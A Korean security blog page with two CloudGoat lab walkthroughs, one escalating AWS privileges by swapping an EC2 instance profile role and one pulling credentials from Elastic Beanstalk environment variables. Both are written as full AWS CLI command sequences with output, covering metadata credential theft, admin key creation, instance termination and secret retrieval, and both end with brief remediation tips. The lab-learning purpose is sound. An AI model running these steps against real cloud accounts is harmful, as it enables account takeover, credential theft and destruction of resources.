'setting' 태그의 글 목록

setting

AWS IAM 정책 첨부로 권한 상승하는 방법 — CloudGoat iam_privesc_by_attachment 풀이

2025. 4. 29. 17:20

문제 URL 경로

https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/cloudgoat/scenarios/aws/iam_privesc_by_attachment/README.md

cloudgoat/cloudgoat/scenarios/aws/iam_privesc_by_attachment/README.md at master · RhinoSecurityLabs/cloudgoat

CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool - RhinoSecurityLabs/cloudgoat

github.com

문제 설명

1. 매우 제한적인 권한을 가진 IAM 사용자 Kerrigan으로 시작할 것

2. EC2 인스턴스를 생성하고 instance-profile-attachment를 이용하여 권한을 상승시킬 것

3. 생성한 EC2 인스턴스에 접근하여 Administrator 권한을 획득하여 "cg-super-critical-security-server" 서버를 삭제할 것

문제 풀이

1. 현재 권한 분석

# ---------- 1. 현재 권한 분석 ----------

### 현재 인스턴스 조회 ###
aws ec2 describe-instances \
	--profile kerrigan
{
    "Reservations": [
        {
            "ReservationId": "r-02b3b796eca066497",
            "OwnerId": "739275444311",
            "Groups": [],
            "Instances": [
                {
                    "Architecture": "x86_64",
					
                    # 중간 생략 #
					
                    "InstanceId": "i-0e4373c105fa428e3"
                }
            ]
        }
    ]
}

### 역할 리스트 ###
aws iam list-roles \
	--profile kerrigan | grep cgid5n4scah1af
# --- 역할 1 --- #
"RoleName": "cg-ec2-meek-role-cgid5n4scah1af",
"Arn": "arn:aws:iam::739275444311:role/cg-ec2-meek-role-cgid5n4scah1af",
"Description": "CloudGoat cgid5n4scah1af EC2 Meek Role",
# --- 역할 2 --- #
"RoleName": "cg-ec2-mighty-role-cgid5n4scah1af",
"Arn": "arn:aws:iam::739275444311:role/cg-ec2-mighty-role-cgid5n4scah1af",
"Description": "CloudGoat cgid5n4scah1af EC2 Mighty Role",


### 인스턴스 프로파일 조회 ###
aws iam list-instance-profiles \
	--profile kerrigan
{
"InstanceProfiles": [
	{
		"Path": "/",
		"InstanceProfileName": "cg-ec2-meek-instance-profile-cgid5n4scah1af",
		"InstanceProfileId": "AIPA2YICACBLUSJDY2HTN",
		"Arn": "arn:aws:iam::739275444311:instance-profile/cg-ec2-meek-instance-profile-cgid5n4scah1af",
		"CreateDate": "2025-04-21T05:51:01+00:00",
		"Roles": [
			{
				"Path": "/",
				"RoleName": "cg-ec2-meek-role-cgid5n4scah1af",
				"RoleId": "AROA2YICACBL573QJBN24",
				"Arn": "arn:aws:iam::739275444311:role/cg-ec2-meek-role-cgid5n4scah1af",
				"CreateDate": "2025-04-21T05:51:00+00:00",
				"AssumeRolePolicyDocument": {
					"Version": "2012-10-17",
					"Statement": [
						{
							"Effect": "Allow",
							"Principal": {
								"Service": "ec2.amazonaws.com"
							},
							"Action": "sts:AssumeRole"
						}
					]
				}
			}
		]
	}
]
}

2. Key Pair 생성 및 인스턴스 프로파일 변경

# ---------- 2. Key Pair 생성 및 인스턴스 프로파일 변경 ----------


### Key pair 생성 ###
aws ec2 create-key-pair \
	--key-name MyKeyPair2 \
	--query KeyMaterial \
	--profile kerrigan \
	--output text > MyKeyPair2.pem


### 인스턴스 생성 ###
aws ec2 run-instances \
    --image-id ami-0655cec52acf2717b \
    --instance-type t2.micro \
    --key-name MyKeyPair2 \
	--subnet-id subnet-018433d538c36cb61 \
	--security-group-ids sg-032c2d69e47036e9c \
	--associate-public-ip-address \
	--profile kerrigan


### 인스턴스 프로파일 역할 제거 ###
aws iam remove-role-from-instance-profile \
    --instance-profile-name cg-ec2-meek-instance-profile-cgid5n4scah1af \
    --role-name cg-ec2-meek-role-cgid5n4scah1af \
	--profile kerrigan


### 인스턴스 프로파일 역할 추가 ###
aws iam add-role-to-instance-profile \
    --role-name cg-ec2-mighty-role-cgid5n4scah1af \
    --instance-profile-name cg-ec2-meek-instance-profile-cgid5n4scah1af \
	--profile kerrigan


### 인스턴스 프로파일 연결 ###
aws ec2 associate-iam-instance-profile \
	--instance-id i-01a2d7a214ece1324 \
	--iam-instance-profile Name=cg-ec2-meek-instance-profile-cgid5n4scah1af \
	--profile kerrigan
{
    "IamInstanceProfileAssociation": {
        "AssociationId": "iip-assoc-0d24a754b30a684d3",
        "InstanceId": "i-040bfd349489d0544",
        "IamInstanceProfile": {
            "Arn": "arn:aws:iam::739275444311:instance-profile/cg-ec2-meek-instance-profile-cgid5n4scah1af",
            "Id": "AIPA2YICACBLUSJDY2HTN"
        },
        "State": "associating"
    }
}

3. 생성한 인스턴스 접근 및 권한 탈취

# ---------- 3. 생성한 인스턴스 접근 및 권한 탈취 ----------

### 생성한 인스턴스 접속 ###
ssh -i MyKeyPair2.pem ubuntu@<EC2 Public IP>


### meta data 요청 ###
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-mighty-role-cgid5n4scah1af


### 역할 프로파일 생성 ###
aws configure set --profile mighty aws_access_key_id <aws_access_key_id>
aws configure set --profile mighty aws_secret_access_key <aws_secret_access_key>
aws configure set --profile mighty aws_session_token <aws_session_token>

4. 탈취한 권한으로 인스턴스 삭제

# ---------- 4. 탈취한 권한으로 인스턴스 삭제 ----------


### 역할에 붙은 Inline 정책 이름 확인 ###
aws iam list-attached-role-policies \
	--role-name cg-ec2-mighty-role-cgid5n4scah1af \
	--profile mighty
{
    "AttachedPolicies": [
        {
            "PolicyName": "cg-ec2-mighty-policy",
            "PolicyArn": "arn:aws:iam::739275444311:policy/cg-ec2-mighty-policy"
        }
    ]
}


### 정책 버전 상세 확인 ###
aws iam get-policy-version \
    --policy-arn arn:aws:iam::739275444311:policy/cg-ec2-mighty-policy \
    --version-id v1 \
    --profile mighty
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": "*",
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2025-04-21T05:50:59+00:00"
    }
}

### 현재 인스턴스 조회 ###
aws ec2 describe-instances \
	--profile mighty
{
	# 중간 생략 #
	"InstanceId": "i-0e4373c105fa428e3"
}

### 인스턴스 종료(Terminate) ###
aws ec2 terminate-instances \
	--instance-ids i-0e4373c105fa428e3 \
	--profile mighty
{
    "TerminatingInstances": [
        {
            "InstanceId": "i-0e4373c105fa428e3",
            "CurrentState": {
                "Code": 32,
                "Name": "shutting-down"
            },
            "PreviousState": {
                "Code": 16,
                "Name": "running"
            }
        }
    ]
}

보안 개선 방안

1. IAM 권한은 최소로 운영할 것

2. EC2 환경 설정값에 기밀정보 저장 금지

내용이 유용하셨다면 좋아요&댓글 부탁드립니다.
이 블로그를 이끌어갈 수 있는 강력한 힘입니다!

caul334@gmail.com

저작자표시 비영리 변경금지 (새창열림)

'IT > Cloud' 카테고리의 다른 글

CloudGoat RDS_snapshot 풀이 — AWS RDS 스냅샷 권한 탈취 시나리오 분석 (0)	2025.05.12
CloudGoat ec2_ssrf 풀이 — SSRF로 EC2 메타데이터 탈취하는 공격 흐름 정리 (0)	2025.05.09
AWS Elastic Beanstalk 환경변수 탈취 실습 — CloudGoat beanstalk_secrets 풀이 (0)	2025.04.15
AWS 역할전환 sts AssumeRole 성립 조건 및 예외사항 (0)	2025.04.14
AWS Lambda 권한 탈취 실습 — CloudGoat vulnerable_lambda 풀이 (0)	2025.04.11

AWS Elastic Beanstalk 환경변수 탈취 실습 — CloudGoat beanstalk_secrets 풀이

2025. 4. 15. 11:34

문제 URL 경로

https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/cloudgoat/scenarios/aws/beanstalk_secrets/README.md

cloudgoat/cloudgoat/scenarios/aws/beanstalk_secrets/README.md at master · RhinoSecurityLabs/cloudgoat

CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool - RhinoSecurityLabs/cloudgoat

github.com

문제 설명

1. Your task is to enumerate the Elastic Beanstalk environment and discover misconfigured environment variables containing secondary credentials. - Beanstalk 환경의 잘못 설정된 값을 찾아 두번째 credential을 발견합니다.
2. Using these secondary credentials, you can enumerate IAM permissions to eventually create an access key for an administrator user. - 두번째 credential을 이용하여 Admin user의 Access Key를 생성합니다.
3. With these admin privileges, you retrieve the final flag stored in AWS Secrets Manager. - Admin 권한을 이용하여 AWS Secrets Manager의 저장된 플래그 값을 찾습니다.

문제 풀이

1. Beanstalk 분석

Beanstalk 환경 세팅 값을 확인해보면 환경 세팅값에 secondary user에 대한 Access Key와 Secret Key를 얻을 수 있습니다.

# ---------- 1. Beanstalk 분석 ----------

### Beanstalk 환경 조회 ###
aws elasticbeanstalk describe-environments \
	--environment-names cgid8qocb6tpgu-env \
	--profile beanstalk_secrets
{
    "Environments": [
        {
            "EnvironmentName": "cgid8qocb6tpgu-env",
            "EnvironmentId": "e-kmrdymu9vz",
            "ApplicationName": "cgid8qocb6tpgu-app",
            "SolutionStackName": "64bit Amazon Linux 2023 v4.5.0 running Python 3.13",
            "PlatformArn": "arn:aws:elasticbeanstalk:us-east-1::platform/Python 3.13 running on 64bit Amazon Linux 2023/4.5.0",
            "EndpointURL": "awseb-e-k-AWSEBLoa-1GC4Y8O31859N-1472090591.us-east-1.elb.amazonaws.com",
            "CNAME": "cgid8qocb6tpgu-env.eba-xyd6ee3n.us-east-1.elasticbeanstalk.com",
            "DateCreated": "2025-04-14T23:44:00.375000+00:00",
            "DateUpdated": "2025-04-14T23:47:00.769000+00:00",
            "Status": "Ready",
            "AbortableOperationInProgress": false,
            "Health": "Grey",
            "HealthStatus": "No Data",
            "Tier": {
                "Name": "WebServer",
                "Type": "Standard",
                "Version": "1.0"
            },
            "EnvironmentLinks": [],
            "EnvironmentArn": "arn:aws:elasticbeanstalk:us-east-1:739275444311:environment/cgid8qocb6tpgu-app/cgid8qocb6tpgu-env"
        }
    ]
}

### applications 확인 ###
aws elasticbeanstalk describe-applications \
	--profile beanstalk_secrets
{
    "Applications": [
        {
            "ApplicationArn": "arn:aws:elasticbeanstalk:us-east-1:739275444311:application/cgid8qocb6tpgu-app",
            "ApplicationName": "cgid8qocb6tpgu-app",
            "Description": "Elastic Beanstalk application for insecure secrets scenario",
            "DateCreated": "2025-04-14T23:43:39.981000+00:00",
            "DateUpdated": "2025-04-14T23:43:39.981000+00:00",
            "ConfigurationTemplates": [],
            "ResourceLifecycleConfig": {
                "VersionLifecycleConfig": {
                    "MaxCountRule": {
                        "Enabled": false,
                        "MaxCount": 200,
                        "DeleteSourceFromS3": false
                    },
                    "MaxAgeRule": {
                        "Enabled": false,
                        "MaxAgeInDays": 180,
                        "DeleteSourceFromS3": false
                    }
                }
            }
        }
    ]
}

### configuration 세팅 출력 ###
aws elasticbeanstalk describe-configuration-settings \
	--environment-name cgid8qocb6tpgu-env \
	--application-name cgid8qocb6tpgu-app \
	--profile beanstalk_secrets
{
    "ConfigurationSettings": [
        {
            "SolutionStackName": "64bit Amazon Linux 2023 v4.5.0 running Python 3.13",
            "PlatformArn": "arn:aws:elasticbeanstalk:us-east-1::platform/Python 3.13 running on 64bit Amazon Linux 2023/4.5.0",
            "ApplicationName": "cgid8qocb6tpgu-app",
            "EnvironmentName": "cgid8qocb6tpgu-env",
            "DeploymentStatus": "deployed",
            "DateCreated": "2025-04-14T23:43:58+00:00",
            "DateUpdated": "2025-04-14T23:43:58+00:00",
            "OptionSettings": [
                {
                    "ResourceName": "AWSEBAutoScalingGroup",
                    "Namespace": "aws:autoscaling:asg",
                    "OptionName": "Availability Zones",
                    "Value": "Any"
                },
				
				---------- 중간 생략 ----------
				
                {
                    "Namespace": "aws:elasticbeanstalk:application:environment",
                    "OptionName": "PYTHONPATH",
                    "Value": "/var/app/venv/staging-LQM1lest/bin"
                },
                {
                    "Namespace": "aws:elasticbeanstalk:application:environment",
                    "OptionName": "SECONDARY_ACCESS_KEY",
                    "Value": "<SECONDARY_ACCESS_KEY>"
                },
                {
                    "Namespace": "aws:elasticbeanstalk:application:environment",
                    "OptionName": "SECONDARY_SECRET_KEY",
                    "Value": "<SECONDARY_SECRET_KEY>"
                }
            ]
        }
    ]
}

2. Secondary User 권한 탈취

Secondary User 권한을 이용하여 Admin 계정의 새로운 Access Key 생성

# ---------- 2. Secondary User 권한 이용 ----------

### secondary_user 프로파일 생성 ###
aws configure --profile secondary_user

###  계정 리스트 확인 ###
aws iam list-users \
	--profile secondary_user
{
	"Path": "/",
	"UserName": "cgid8qocb6tpgu_admin_user",
	"UserId": "AIDA2YICACBLQMUTAH7PG",
	"Arn": "arn:aws:iam::739275444311:user/cgid8qocb6tpgu_admin_user",
	"CreateDate": "2025-04-14T23:43:39+00:00"
},
{
	"Path": "/",
	"UserName": "cgid8qocb6tpgu_low_priv_user",
	"UserId": "AIDA2YICACBLQKPVTUJSM",
	"Arn": "arn:aws:iam::739275444311:user/cgid8qocb6tpgu_low_priv_user",
	"CreateDate": "2025-04-14T23:43:39+00:00"
},
{
	"Path": "/",
	"UserName": "cgid8qocb6tpgu_secondary_user",
	"UserId": "AIDA2YICACBLUFUYYWA7U",
	"Arn": "arn:aws:iam::739275444311:user/cgid8qocb6tpgu_secondary_user",
	"CreateDate": "2025-04-14T23:43:39+00:00"
}

### <user> 에게 적용된 Managed 정책 확인 ###
aws iam list-attached-user-policies \
	--user-name cgid8qocb6tpgu_secondary_user \
	--profile secondary_user
{
    "AttachedPolicies": [
        {
            "PolicyName": "cgid8qocb6tpgu_secondary_policy",
            "PolicyArn": "arn:aws:iam::739275444311:policy/cgid8qocb6tpgu_secondary_policy"
        }
    ]
}

### Managed 정책 확인 ###
aws iam get-policy-version \
	--policy-arn arn:aws:iam::739275444311:policy/cgid8qocb6tpgu_secondary_policy \
	--version-id v1 \
	--profile secondary_user
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "iam:CreateAccessKey"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                },
                {
                    "Action": [
                        "iam:ListRoles",
                        "iam:GetRole",
                        "iam:ListPolicies",
                        "iam:GetPolicy",
                        "iam:ListPolicyVersions",
                        "iam:GetPolicyVersion",
                        "iam:ListUsers",
                        "iam:GetUser",
                        "iam:ListGroups",
                        "iam:GetGroup",
                        "iam:ListAttachedUserPolicies",
                        "iam:ListAttachedRolePolicies",
                        "iam:GetRolePolicy"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2025-04-14T23:43:39+00:00"
    }
}


### Access Key 생성 ###
aws iam create-access-key \
    --user-name cgid8qocb6tpgu_admin_user \
	--profile secondary_user
{
    "AccessKey": {
        "UserName": "cgid8qocb6tpgu_admin_user",
        "AccessKeyId": "<AccessKeyId>",
        "Status": "Active",
        "SecretAccessKey": "<SecretAccessKey>",
        "CreateDate": "2025-04-15T02:09:08+00:00"
    }
}

3. Admin User 권한 탈취

Admin User 권한을 이용하여 Secret Manager 서비스에 저장되어 있는 Flag값 확인

# ---------- 3. Secondary User 권한 이용 ----------

### Admin 계정 프로파일 생성 ###
aws configure --profile admin_user

###  Secret 리스트 조회 ###
aws secretsmanager list-secrets \
	--profile admin_user
{
    "SecretList": [
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:739275444311:secret:cgid8qocb6tpgu_final_flag-P2uAGc",
            "Name": "cgid8qocb6tpgu_final_flag",
            "LastChangedDate": "2025-04-15T08:43:41.415000+09:00",
            "LastAccessedDate": "2025-04-14T09:00:00+09:00",
            "Tags": [
                {
                    "Key": "Stack",
                    "Value": "CloudGoat"
                },
                {
                    "Key": "Scenario",
                    "Value": "beanstalk_secrets"
                }
            ],
            "SecretVersionsToStages": {
                "terraform-20250414234341025200000002": [
                    "AWSCURRENT"
                ]
            },
            "CreatedDate": "2025-04-15T08:43:39.546000+09:00"
        }
    ]
}

### Secret 확인 ###
aws secretsmanager get-secret-value \
    --secret-id cgid8qocb6tpgu_final_flag \
	--profile admin_user
{
    "ARN": "arn:aws:secretsmanager:us-east-1:739275444311:secret:cgid8qocb6tpgu_final_flag-P2uAGc",
    "Name": "cgid8qocb6tpgu_final_flag",
    "VersionId": "terraform-20250414234341025200000002",
    "SecretString": "FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": "2025-04-15T08:43:41.410000+09:00"
}

Admin User의 권한을 통해 Secret Manger의 Secret 값을 확인해보면 아래 이미지와 같이 Flag 값을 확인할 수 있습니다.

보안 개선 방안

1. IAM 권한은 최소로 운영할 것

2. Beanstalk 환경 설정값에 기밀정보 저장 금지

내용이 유용하셨다면 좋아요&댓글 부탁드립니다.
이 블로그를 이끌어갈 수 있는 강력한 힘입니다!

caul334@gmail.com

저작자표시 비영리 변경금지 (새창열림)

'IT > Cloud' 카테고리의 다른 글

CloudGoat ec2_ssrf 풀이 — SSRF로 EC2 메타데이터 탈취하는 공격 흐름 정리 (0)	2025.05.09
AWS IAM 정책 첨부로 권한 상승하는 방법 — CloudGoat iam_privesc_by_attachment 풀이 (0)	2025.04.29
AWS 역할전환 sts AssumeRole 성립 조건 및 예외사항 (0)	2025.04.14
AWS Lambda 권한 탈취 실습 — CloudGoat vulnerable_lambda 풀이 (0)	2025.04.11
AWS S3 데이터 유출 공격 시나리오 실습 — CloudGoat cloud_breach_s3 풀이 (0)	2025.04.10

PREV 1 NEXT

보안 엔지니어의 AWS & Cloud Security 기술노트

setting

AWS IAM 정책 첨부로 권한 상승하는 방법 — CloudGoat iam_privesc_by_attachment 풀이

문제 URL 경로

문제 설명

문제 풀이

1. 현재 권한 분석

2. Key Pair 생성 및 인스턴스 프로파일 변경

3. 생성한 인스턴스 접근 및 권한 탈취

4. 탈취한 권한으로 인스턴스 삭제

보안 개선 방안

'IT > Cloud' 카테고리의 다른 글

AWS Elastic Beanstalk 환경변수 탈취 실습 — CloudGoat beanstalk_secrets 풀이

문제 URL 경로

문제 설명

문제 풀이

1. Beanstalk 분석

2. Secondary User 권한 탈취

3. Admin User 권한 탈취

보안 개선 방안

'IT > Cloud' 카테고리의 다른 글

+ Recent posts

티스토리툴바